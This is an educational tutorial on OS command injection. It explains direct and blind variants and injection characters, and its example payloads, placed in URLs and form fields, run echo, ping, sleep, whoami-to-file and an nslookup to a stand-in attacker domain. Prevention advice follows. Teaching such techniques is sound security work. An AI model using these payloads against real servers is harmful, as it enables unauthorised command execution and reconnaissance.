Os Command Injection

What is OS Command Injection?

OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into a vulnerable application. This occurs when user input is passed to a shell command without sufficient sanitization.

How It Works

The attacker manipulates user input to inject malicious commands. For example:

1. Input is included in a backend command such as:

   stockreport.pl 432 32

2. Malicious input like 432 & echo hello & modifies the command:

   stockreport.pl 432 & echo hello & 32

   This causes the shell to execute echo hello alongside the intended command.

Types of OS Command Injection

1. Direct Injection

The output of the injected command is visible in the application response. Example:

https://insecure-website.com/stockStatus?productID=& echo hello &

If the response includes hello, the injection is successful.

2. Blind Injection

The output of the injected command is not visible in the response. Various techniques can be used to confirm execution:

• Timing Attacks:

  • Inject a time delay to observe the response time.

    https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &

• File Writing:

  • Write command output to a file accessible via the web.

    https://vulnerable-website.com/stockStatus?productID=& whoami > /var/www/static/whoami.txt &

• Out-of-Band Interaction:

  • Trigger DNS lookups or HTTP requests to an attacker-controlled server.

    https://vulnerable-website.com/stockStatus?productID=& nslookup attacker-domain.com &

Injection Characters

The following characters can be used to inject commands:

Character	Usage
&	Execute multiple commands sequentially.
&&	Execute the next command only if the previous one succeeds.
;	Separate multiple commands.
Newline ()	Separate commands (Unix-specific).

Bash-Specific Characters:

• ` (Backticks): Execute commands within the backticks.

• $() (Subshell): Execute commands within the parentheses.

Examples of OS Command Injection

Exploiting GET Parameters

1. Echo Command Injection:

   https://insecure-website.com/stockStatus?productID=& echo hello &

2. Timing-Based Blind Injection:

   https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &

Exploiting POST Parameters

1. Inject Commands into Form Fields:

   POST /submit-form HTTP/1.1
   csrf=token&name=test&email=test@example.com & sleep 10 #&subject=Testing

2. Redirect Output:

   & whoami > /var/www/static/whoami.txt &

Useful Commands for Testing

Purpose	Linux Command	Windows Command
Current user	whoami	whoami
Operating system	uname -a	ver
Network configuration	ifconfig	ipconfig /all
Open network connections	netstat -an	netstat -an
Running processes	ps -ef	tasklist

Advanced Techniques

Using Time Delays

Inject a delay to observe execution:

& sleep 10 &

Redirecting Output

Write command output to a file accessible via the web:

& whoami > /var/www/static/whoami.txt &

Out-of-Band Interaction

Trigger DNS or HTTP requests to an attacker-controlled server:

& nslookup attacker-domain.com &

---

How to Prevent OS Command Injection

1. Avoid Shell Commands:

   • Avoid passing user input to shell commands.

   • Use high-level APIs or libraries to handle tasks like file operations or process management.

2. Validate User Input:

   • Use a safelist to restrict allowed characters and commands.

   • Block special characters like &, |, ;, and `.

3. Sanitize Input:

   • Use escaping techniques appropriate to the shell environment.

4. Use Strong Permissions:

   • Limit the application's ability to execute shell commands or access sensitive files.

5. Employ Security Measures:

   • Use Web Application Firewalls (WAFs) to block malicious requests.